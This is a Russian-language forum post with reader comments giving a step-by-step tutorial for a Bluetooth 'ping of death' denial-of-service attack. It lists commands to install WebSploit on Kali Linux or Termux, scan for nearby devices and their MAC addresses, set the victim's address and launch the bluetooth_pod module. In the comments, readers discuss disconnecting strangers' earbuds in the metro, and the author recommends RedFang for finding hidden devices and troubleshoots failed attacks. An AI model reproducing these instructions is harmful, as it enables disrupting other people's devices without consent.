Bluetooth dos (ping of death) attack.

Вся информация представлена в ознакомительных целях и автор не несет ответственности за ваши действия.

Сегодня речь пойдет о такой интересной теме как рызрыв соединения bluetooth.
К сожалению информации о том как оборвать соединение bluetooth довольно мало, а приложений которые бы делали это сами я не нашел, поэтому это нужно делать из под операционной системы Kali linux, как ее установить полно информации.

Итак начнем, для начала нужно открыть терминал, работать будем с websploit (можно и через wifite, но существеннрй разницы нет), чтобы установить websploit необходимо ввести следующие команды:
Установка зависимостей

sudo apt-get install scapy

Загрузка архива

wget http://downloads.sourceforge.net/project/websploit/WebSploit...

Распаковка архива

tar xzf WebSploit\ Framework\ V.X.X.X.tar.gz

Перейти в каталог

cd Easy\ Install

Запускаем скрипт установки

sudo ./install.sh

Ждем
После этого в терминале введите:

websploit

Появится похожая штука, значит все сделано правильно.

Теперь вводим командy:

use bluetooth/bluetooth_pod

Этой командой мы задаем адрес атакуемого.

set bdaddr 00:00:00:00:00:00

Вместо нулей адрес жертвы.
Узнать его можно как в самом терминале так и приложением с телефона, в терминале сканируем так:
Велючаем bluetooth

hciconfig hci0 up

Сканируем

hcitool scan

Далее появится список устройств с их мак адресами, этот адрес забиваем вместо 00:00:00:00:00:00.
Затем вводим

run

Начинается атака, bluetooth соединение должно оборваться.
Кому интересно попробуйте сделать тоже самое, но с помощью termux на телефоне, к сожалению у меня какие-то проблемы с bluetooth, поэтому провести атаку не получается.
Вот команды для termux:

$ apt install python2

$ pip2 install scapy

$ git clone https://github.com/The404Hacking/websploit.git

$ cd websploit

$ chmod 777 * websploit.py

$ python2 websploit.py

Всем спасибо за внимание)

DELETED
Автор поста оценил этот комментарий

Профит то какой? Беспроводные уши в метро отключать? А если видимость отключена?

раскрыть ветку (1)
8
Автор поста оценил этот комментарий
Утилита RedFang обнаружит скрытые устройства путем перебора мак адресов, это уже особенности сканирования, дешёвые колонки не обладают возможностью скрываться.
показать ответы
Автор поста оценил этот комментарий

@moderator, тут немножко вредные действия, неадекватов в сети хватает...

раскрыть ветку (1)
8
Автор поста оценил этот комментарий
Вот ты жопа...
показать ответы
5
Автор поста оценил этот комментарий
У меня есть вопрос. Дудосить колонки можно только из-под линукса? Нет ли метода для винды?Или, ещё лучше, из-под андроида?
раскрыть ветку (1)
4
Автор поста оценил этот комментарий
Есть KaliNetHunter для телефона, она устанавливается поверх основной ОС, а есть приложение-терминал termux, я ставил на него вебсплоит и пробовал произвести атаку на свои наушники, у меня не вышло, поэтому я планирую поставить NetHunter и попробовать с него, также можно гасить соединение со старенького кнопочного самсунга с приложухой на яве, но об этом в другой раз, это все известные мне способы, есть еще один человек, на ютубе его ник overbafer1, много роликов по кибербезопасности.
показать ответы
7
Автор поста оценил этот комментарий
Смотрю пикабу сжал ссылку, вот полный туториал по установке:
http://darcade.de/linux/websploit-tutorial
показать ответы
1
Автор поста оценил этот комментарий

Эм не работает бесконечная надпись типо блютуз смерть стартаёт

раскрыть ветку (1)
1
Автор поста оценил этот комментарий
Привет, с того момента довольно много времени прошло, в Termux отсутствует поддержка bluetooth, это делает команды для termux неактуальными.
0
Автор поста оценил этот комментарий

Как я поняла с помощью кали линукс можно взломать любое беспроводное устройство https://codeby.net/threads/kak-vzlomat-bluetooth-chast-1-ter... Правильно?

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Kali linux это дистрибутив напичканный программным обеспечением для тестирования различных информационных систем на безопасность (может быть использован и для взлома, что противозаконно).

1
Автор поста оценил этот комментарий

И в термуксе не работает блюпуп, в апи термукса нет поддержки блюпупа. от этого многие страдают

раскрыть ветку (1)
0
Автор поста оценил этот комментарий
Есть еще один вариант это использование вот такого вот микрокомпьютера, на него накатить образ кали и уже на кали через терминал установить вебсплоит, хотя он уже должен там стоять. Для разрыва соединения нужно знать мак адрес атакуемого, имя блютуз это вроде hci0 или другой командой show options можно чекнуть настройки скрипта.
Иллюстрация к комментарию
0
Автор поста оценил этот комментарий

хай, слушай, вопрос, из вопросов попробовал я websploit атаку на БТ, после ввода run нифига не происходит. Есть видео, че там должно происходить? А то сцука все робит и тд, на трех уже своих телефонах попробовал

раскрыть ветку (1)
0
Автор поста оценил этот комментарий
С какого устройства была атака? Ввели ли вы мак адрес атакуемого? И самое главное это нужно указать сам блютуз hci0 в параметах скрипта.Прошу прощения за долгий ответ, был забанен на 2 недели.
показать ответы